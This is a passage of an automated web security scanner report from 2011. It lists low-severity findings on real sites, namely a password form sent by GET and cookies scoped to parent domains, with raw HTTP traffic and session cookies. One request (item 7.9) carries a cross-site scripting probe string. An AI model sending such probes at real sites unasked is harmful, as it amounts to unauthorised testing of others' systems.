Set-Cookie: d=e77e75edfe85a5c092ebbce18a8db8a109d3f58ee422bb99aa8f404c459dbd21; expires=Tue, 19-Jan-2021 10:47:58 GMT; path=/; domain=.digg.com
X-Digg-Time: D=28518 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.3. http://www.americascupmedia.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:44:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

7. Cookie scoped to parent domain  previous  next
There are 29 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


7.1. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=lvkjt5porujgfu07pt29oc6nc4; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=1329568984d378700841812.33812512; expires=Sat, 19-Feb-2011 00:51:12 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 19-Feb-2011 00:51:12 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 19-Feb-2011 00:51:12 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=99539ab0f0f4d690f31ffb8596964be6%7C%7C10%7C%7C1295484672%7C38a8ed554e38c299f37f5b3c35f57c23; expires=Sun, 17-Jan-2021 00:51:12 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7324
Date: Thu, 20 Jan 2011 00:51:12 GMT
X-Varnish: 1927125712
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...

7.2. http://2822.v.fwmrm.net/ad/g/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2822.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/g/1?nw=10274&pvrn=Insert%20Random%20Number%20Here&csid=display&resp=ad;;ptgt=s&envp=g_js&slid=Rectangle&w=300&h=250 HTTP/1.1
Host: 2822.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://blip.tv/file/4639878
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="a104_5562153497824379009"; _vr="1295039779..246255~312652~,"; _cph="1295039779.438.1.1,"; _sc="sg122034.1295039779.1295039779.28800.0.0,"; _wr="g122034"

Response

HTTP/1.1 200 OK
Set-Cookie: _sid="c115_5564057886323802955";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1295483178..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg23001.1295483179.1295483179.28800.0.0,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
X-FW-Power-By: Dot
Content-Type: text/javascript
Cteonnt-Length: 126
Pragma: no-cache
Date: Thu, 20 Jan 2011 00:26:19 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3c45525d5f4f58455e445a4a423209;path=/;httponly
Content-Length: 126

document.write("<span style=\"display:inline-block; vertical-align:top; margin:125px 150px 125px 150px;\"><!-- --></span>\n");

7.3. http://2822.v.fwmrm.net/ad/l/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2822.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/l/1?last=0&ct=0&metr=127&s=a116&t=12954824355285936&adid=170504&reid=79402&arid=0&auid=&cn=defaultImpression&et=i&_cc=170504,79402,11811.,11074.11081.11744.11811.,1295482435,1&tpos=0&iw=&uxnw=&uxss=&uxct=&init=1&cr= HTTP/1.1
Host: 2822.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cph="1295039779.438.1.1,"; _sid="a116_5564054660803241609"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3545525d5f4f58455e445a4a423209; _uid="a104_5562153497824379009"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,"; _sc="sg23001.1295482428.1295482436.28800.0.0,"; _wr="g23001"

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:14:07 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g23001~1.1295482447.0,13310.1295482447.0,^";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg23001.1295482428.1295482447.28800.0.0,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Date: Thu, 20 Jan 2011 00:14:06 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


7.4. http://2822.v.fwmrm.net/ad/p/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2822.v.fwmrm.net
Path:   /ad/p/1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /ad/p/1? HTTP/1.1
Host: 2822.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
content-type: text/xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1295039779..246255~312652~,"; _cph="1295039779.438.1.1,"; _sid="a116_5564054660803241609"; _uid="a104_5562153497824379009"; _sc="sg23001.1295482428.1295482428.28800.0.0,"; _wr="g23001"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3545525d5f4f58455e445a4a423209
Content-Length: 2465

<adRequest networkId="10274" version="1" profile="10274:blip_showplayer_as3"><customDistributor /><capabilities><supportsSlotTemplate /><explicitVideoTracking /><expectMultipleCreativeRenditions /><su
...[SNIP]...

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:13:55 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg23001.1295482428.1295482435.28800.0.0,";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/xml
Pragma: no-cache
Vary: Accept-Encoding
Date: Thu, 20 Jan 2011 00:13:55 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Content-Length: 26163

<adResponse version='1'><rendererManifest version='1'>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;adRenderers version=&apos;1&apos;&gt;&lt;adRenderer adUnit=&apos;video,fixed-
...[SNIP]...

7.5. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad?asId=1000000238307&sd=2x728x90&ct=15&enc=1&nif=1&sf=0&sfd=0&ynw=0&anw=1&rand=89023115&rk1=28177253&rk2=1295482425.162&pt=0&asc=139x31&vad=950x996 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; c=AQEBAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/javascript
Content-Length: 1087
Set-Cookie: f=AgEBAAAAAAAMqJEHA343TQ==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
Set-Cookie: c=AQECAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00BAAEAdaTl1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

document.write("<script language=\"JavaScript\" src=\"http://a.collective-media.net/adj/cm.martini/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ
...[SNIP]...

7.6. http://ad.doubleclick.net/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3a95/3/0/*/s;234980170;1-0;0;57570438;2321-160/600;40268054/40285841/1;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;~okv=;pc=DFP234824030;;~aopt=0/ff/ef/ff;~fdr=234824030;0-0;62;49633220;2321-160/600;40285688/40303475/1;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;~okv=;net=cm;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;;cmw=owl;sz=160x600;net=cm;ord1=405617;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sports_l;btg=cm.weath_l;~aopt=2/0/ef/0;~sscs=?http:/www.lexus.com/thehardway/?vidid=thw3&cid=THW11NBROBOT HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.lexus.com/thehardway/?vidid=thw3&cid=THW11NBROBOT
Set-Cookie: id=c653243310000d9|1044889/556043/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 20 Jan 2011 00:35:29 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


7.7. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;234517278;58326487;v;pc=[TPAS_ID] HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.sho.com/site/order/index.do?source=acq_m_jan?source=m_JAQ_1047249_58326487_0&utm_source=58326487&utm_medium=omddisplay&utm_content=0&utm_campaign=JAQ
Set-Cookie: id=c653243310000d9|2201481/1047249/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 20 Jan 2011 00:35:32 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


7.8. http://brxserv.btrll.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:28:43 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:28:43 GMT; path=/; domain=.btrll.com
Content-Length: 161
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
Found unexpected '.' character in position 1 of path: /favicon.ico</body>
</html>

7.9. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AD)%3C/script%3E HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:30:52 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:30:52 GMT; path=/; domain=.btrll.com
Content-Length: 243
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
Missing parameter in position 7 of path: /v1/epix/2903/3844555/1938/2286/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea
...[SNIP]...

7.10. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]]

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]] HTTP/1.1
Host: brxserv.btrll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:40:06 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:06 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://2901.btrll.com/clk/2901/4258/PreRoll.911.109723/none/;Video;1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.11. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:14:37 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:14:37 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/done;Video;1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.12. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]]

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]] HTTP/1.1
Host: brxserv.btrll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:40:05 GMT
Server: Apache/2.0.63 (Unix)
